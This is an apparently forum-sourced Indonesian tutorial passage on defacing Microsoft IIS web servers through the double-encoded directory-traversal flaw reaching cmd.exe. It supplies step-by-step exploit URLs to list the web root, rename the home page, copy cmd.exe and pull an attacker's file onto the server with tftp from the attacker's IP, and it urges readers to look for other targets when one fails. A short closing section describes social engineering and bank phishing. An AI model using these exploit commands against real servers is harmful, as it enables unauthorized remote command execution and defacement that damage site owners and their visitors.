Tapi terkadang web administrator menggantinya dengan yang lain. Untuk mengetahuinya ,anda cukup mengetikkan URL seperti di bawah ini

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+set

URL diatas akan menampilkan daftar environment variable dari web server sasaran. Tugas anda sekarang adalah mencari PATH_TRANSLATED atau tulisan PATH_TRANSLATEDnyah, jika tidak ketemu coba refresh lagi. Sekarang kita DIR PATH_TRANSLATED nya. Kita ambil contoh PATH_TRANSLATEDnya : C:\InetPub\wwwroot…. Perintahnya ng-DIR nyah : http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot. Jika sudah terbuka dokumennya,dan telah ter-DIR PATH_TRANSLATEDnya lalu kita cari dokumen web itu dan kita RENAME. Gimana kalau misalnya dokumen2 web yg kita curigain itu ada 3, coba sekarang anda buka site aslinya di lain window, http://www.targethost.com == di http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot dokumen2 web nya ada 3 macam pasti kita bingung yg mana yg mau di RENAME misalnya : di http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot itu ada : Directory of C:\InetPub\wwwroot
07/20/01 03:21p 1,590 default.htm
07/20/01 03:21p 590 index.html
07/20/01 03:21p 3,453 main.html
Udah di buka kan site aslinya nah coba masukan salah satu dokumen web itu di site asli nya… contoh : http://www.targethost.com/default.htm kita liat hasilnya apa kah sama gambarnya (halaman depannya) setelah kita masukin dokumen web tadi ternyata sama gambarnya. Nah skrg kita RENAME yg main html itu. Perintahnya :

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ren+C:\InetPub\wwwroot\main.html+gue.html

Lihat apa yg terjadi di IE kita CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
Access is denied
Gagal disini, namun cari lagi target lain
Dapat target baru langsung di RENAME aja. Hasilnya setelah di RENAME seperti di bawah ini :
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are :
Nah kalau seperti diatas anda telah merubah or berhasil men-deface halaman depan web site tersebut,buktikan dengan mencoba buka site aslinya dan hasilnya pasti ERROR (Jgn lupa kita simpan C:\InetPub\wwwroot\main.html *file yg kita rename tadi di notepad utk langkah selanjutnya*)
Sekarang anda upload file anda ke site tadi..` Pertama lewat ECHO..Kedua lewat TFTP32.
*Cara pertama :*
Utk meng-upload file lewat echo sebelumnya kita harus mengcopy file cmd.exe pada direktori C:\winnt\system32 ke suatu folder lain atau folder yang sama dengan nama lain, misalnya cmdku.exe. Untuk meng-copy cmd.exe menjadi cmdku.exe pada folder winnt\system32 maka cukup ketik URL berikut :

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\cmdku.exe

Pasti hasilnya akan seperti di bawah ini :
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are :
1 file(s) copied.
Tujuan kita meng-copy cmd.exe menjadi cmdku.exe adalah agar kita bisa menjalankan perintah echo dengan lengkap. Apabila Anda menggunakan cmd.exe maka perintah echo tidak bisa digunakan untuk menulis atau membuat file.
Okeih Sob skrg mari kita up-load file nya lewat perintah echo perintahnya :
dapat dilihat disini
Kita liat apa yg terjadi di IE kita.
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are :
Selamat anda telah berhasil meng-upload file anda lewat cara echo tadi silahkan buka web site target tadi.
Saya akan membagi URL tadi menjadi empat bagian :
• Bagian hosting dan exploit string yaitu, http://www.targethost.com/scripts/..%255c..%255c
• Bagian command yaitu, cmdku.exe?/c+echo+
• Bagian HTML
• Bagian PATH_TRANSLATEDnyah(rootnyah)+Dokumen webnyah yaitu,
C:\InetPub\wwwroot\main.html
Cara Kedua Utk meng-upload file lewat TFTP32 sebelumnya anda harus mendownload software TFTP32 terlebih dahulu di http://www.download.com ketik keynya TFTP32 dan anda harus main diserver (sebab di user pasti tidak bisa). Meng-upload file lewat TFTP32.. anda tdk perlu mengcopy cmd.exe nya langsung aja.
Perintah Meng-uploadnya :
•http://www.targethost.com/scripts/..%255c..%255c
/winnt/system32/cmd.exe?/c+tftp+-i+202.95.145.71(IP mu)+get+antique.htm(file yg mau anda
up-load)+ C:\InetPub\wwwroot\main.html
Kita liat lagi apa yg terjadi di IE kita.
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are :
Anda telah berhasil meng-upload file anda memakai software TFTP32 tadi silahkan buka web site target tadi.
Saya akan uraikan juga URL tadi menjadi 4 bagian :
• Bagian hosting dan exploit string yaitu, http://www.targethost.com/scripts/..%255c..%255c
• Bagian folder, yaitu /winnt/system32/
• Bagian command, yaitu cmd.exe?/c+tftp+-i+202.95.145.71(IPmu)+get+antique.htm(file yg mau koe up-load)+
• Bagian PATH_TRANSLATEDNYAH(rootnyah)+Dokumen webnyah yaitu,
C:\InetPub\wwwroot\main.htm
Kekurangannya dalam meng-upload file lewat TFTP32terkadang suatu server (web site) tidak mau menerima up-load file kita tadi. Jika itu terjadi maka gunakanlah cara pertama diatas.

Sumber: http://hacker01.indonesianforum.net/t9-teknik-deface-server-ms-iis-by-codenesia

Apa itu Social Engineering ?

Pengertian

Social Engineering adalah sebuah teknik pendekatan yang memanfaatkan aspek-aspek sosial di dunia komputer dan internet. Teknik ini biasanya digunakan untuk mendapatkan data-data pribadi seseorang untuk keperluan yang negatif seperti pencurian rekening bank, pencurian password, pencurian akun-akun tertentu atau kejahatan teknologi yang berpotensi lainnya. Semua hal ini dilakukan oleh para hacker dan sejenisnya. Para hacker memanfaatkan kelemahan suatu sistem yaitu manusia, karena tidak ada sitem di dunia ini yang tidak melibatkan interaksi manusia. Secanggih apapun teknologi internet tetap membutuhkan manusia, kelemahan ini bersifat universal, tidak tergantung platform, sistem informasi, protokol, software ataupun hardware. Intinya, semua sistem memiliki kekurangan yang sama pada satu titik yaitu pada faktor sosial manusia.

Faktor

Social Engineering ini bisa terjadi karena banyak faktor, diantaranya adalah faktor kecerobohan seorang user dalam mengelola passwordnya atau bisa juga seorang hacker berpura-pura menajdi orang yang berkepentingan dalam sebuah sistem dan seolah-olah memerlukan password, akses ke jaringan, peta jaringan, konfigurasi sistem dan semacamnya untuk suatu keperluan tertentu. Masih banyak faktor-faktor lainnnya yang semua itu merupakan diri manusia itu sendiri.

Contoh

Contoh lainnya adalah hacker berpura-pura sedang melakukan perbaikan sistem akun perbankan dan mengirimkan informasi itu kepada para nasabah bank. Hacker kemudian memerintahkan memasukkan data-data pribadinya untuk keperluan tersebut. Hacker tentu saja berusaha untuk membuat percaya nasabah bahwa informasi itu benar-benar dari kantor induk bank dengan melampirkan nama dan alamat nasabah sehingga nasabah tertipu. Hackerpun kemudian bisa dengan mudah mendapatkan password atau semacamnya karena nasabahlah yang menuliskannya sendiri.